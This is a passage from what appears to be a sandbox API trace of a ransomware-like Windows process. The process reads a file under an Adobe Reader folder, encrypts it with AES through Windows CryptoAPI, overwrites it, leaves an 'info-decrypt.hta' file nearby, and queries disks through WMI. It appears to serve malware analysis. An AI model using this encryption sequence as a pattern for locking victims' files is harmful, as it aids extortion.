[0153.775] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0153.775] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0153.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0153.775] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0153.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0153.775] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0153.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0153.775] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), fInfoLevelId=0x0, lpFileInformation=0x36e1008 | out: lpFileInformation=0x36e1008*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b)) returned 1 [0153.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0153.777] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0153.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0153.777] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0153.777] GetFileType (hFile=0x2f0) returned 0x1 [0153.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0153.777] GetFileType (hFile=0x2f0) returned 0x1 [0153.778] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x423b [0153.778] ReadFile (in: hFile=0x2f0, lpBuffer=0x3734a20, nNumberOfBytesToRead=0x423b, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x3734a20*, lpNumberOfBytesRead=0x8f6eedc*=0x423b, lpOverlapped=0x0) returned 1 [0153.781] CloseHandle (hObject=0x2f0) returned 1 [0153.781] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbdf9d0) returned 1 [0153.782] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x3738fb0 | out: pbBuffer=0x3738fb0) returned 1 [0154.374] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x37dec84, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xbe16a8) returned 1 [0154.374] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0154.374] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0154.374] CryptDuplicateKey (in: hKey=0xbe16a8, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xbe1668) returned 1 [0154.374] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0154.374] CryptSetKeyParam (hKey=0xbe1668, dwParam=0x4, pbData=0x37ded64*=0x1, dwFlags=0x0) returned 1 [0154.374] CryptSetKeyParam (hKey=0xbe1668, dwParam=0x1, pbData=0x37ded30, dwFlags=0x0) returned 1 [0154.374] CryptEncrypt (in: hKey=0xbe1668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37ded74*, pdwDataLen=0x8f6eea8*=0x4240, dwBufLen=0x4240 | out: pbData=0x37ded74*, pdwDataLen=0x8f6eea8*=0x4240) returned 1 [0154.374] CryptEncrypt (in: hKey=0xbe1668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37e2fd8*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x37e2fd8*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0154.376] CryptDestroyKey (hKey=0xbe16a8) returned 1 [0154.376] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0154.376] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0154.376] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0154.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0154.376] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0154.378] GetFileType (hFile=0x45c) returned 0x1 [0154.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0154.378] GetFileType (hFile=0x45c) returned 0x1 [0154.378] WriteFile (in: hFile=0x45c, lpBuffer=0x37e35d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x37e35d0*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0154.379] CloseHandle (hObject=0x45c) returned 1 [0154.380] CoTaskMemAlloc (cb=0x20c) returned 0xbe2e58 [0154.380] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe2e58 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0154.380] CoTaskMemFree (pv=0xbe2e58) [0154.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.381] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0154.381] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0154.381] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0154.381] IUnknown:Release (This=0xb51e34) returned 0x1 [0154.383] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6024b10) returned 0x0 [0154.383] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024b10, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0154.383] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024b10, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6025ca0) returned 0x0 [0154.383] WbemDefPath:IUnknown:Release (This=0x6024b10) returned 0x0 [0154.383] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ca0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6025ca0) returned 0x0 [0154.383] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ca0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0154.384] WbemDefPath:IUnknown:AddRef (This=0x6025ca0) returned 0x3 [0154.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ca0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0154.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ca0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0154.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ca0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66cca48) returned 0x0 [0154.384] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cca48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0154.384] WbemDefPath:IUnknown:Release (This=0x66cca48) returned 0x3 [0154.384] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0154.384] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0154.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ca0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0154.384] WbemDefPath:IUnknown:Release (This=0x6025ca0) returned 0x2 [0154.384] WbemDefPath:IUnknown:Release (This=0x6025ca0) returned 0x1 [0154.384] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0154.384] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0154.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ca0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6025ca0) returned 0x0 [0154.384] WbemDefPath:IUnknown:AddRef (This=0x6025ca0) returned 0x3 [0154.384] WbemDefPath:IUnknown:Release (This=0x6025ca0) returned 0x2 [0154.384] WbemDefPath:IWbemPath:SetText (This=0x6025ca0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ca0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetText (in: This=0x6025ca0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetText (in: This=0x6025ca0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025ca0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ca0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025ca0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025ca0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ca0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0154.385] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0154.385] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0154.386] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0154.387] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0154.387] IUnknown:Release (This=0xb51e34) returned 0x1 [0154.388] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6024a50) returned 0x0 [0154.388] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024a50, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0154.388] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024a50, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6025d10) returned 0x0 [0154.388] WbemDefPath:IUnknown:Release (This=0x6024a50) returned 0x0 [0154.388] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6025d10) returned 0x0 [0154.388] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0154.389] WbemDefPath:IUnknown:AddRef (This=0x6025d10) returned 0x3 [0154.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0154.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0154.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66cccf8) returned 0x0 [0154.389] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cccf8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0154.389] WbemDefPath:IUnknown:Release (This=0x66cccf8) returned 0x3 [0154.389] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0154.389] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0154.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0154.389] WbemDefPath:IUnknown:Release (This=0x6025d10) returned 0x2 [0154.389] WbemDefPath:IUnknown:Release (This=0x6025d10) returned 0x1 [0154.389] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0154.389] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0154.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d10, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6025d10) returned 0x0 [0154.389] WbemDefPath:IUnknown:AddRef (This=0x6025d10) returned 0x3 [0154.389] WbemDefPath:IUnknown:Release (This=0x6025d10) returned 0x2 [0154.389] WbemDefPath:IWbemPath:SetText (This=0x6025d10, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0154.389] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025d10, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0154.389] WbemDefPath:IWbemPath:GetText (in: This=0x6025d10, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0154.389] WbemDefPath:IWbemPath:GetText (in: This=0x6025d10, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0154.390] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0154.390] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0154.390] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0154.390] IUnknown:Release (This=0xb51e34) returned 0x1 [0154.391] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6027180) returned 0x0 [0154.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0154.391] WbemLocator:IClassFactory:CreateInstance (in: This=0x6027180, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6024b20) returned 0x0 [0154.391] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x0 [0154.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6024b20) returned 0x0 [0154.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0154.391] WbemLocator:IUnknown:AddRef (This=0x6024b20) returned 0x3 [0154.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0154.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0154.391] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0154.391] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0154.391] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0154.391] WbemLocator:IUnknown:QueryInterface (in: 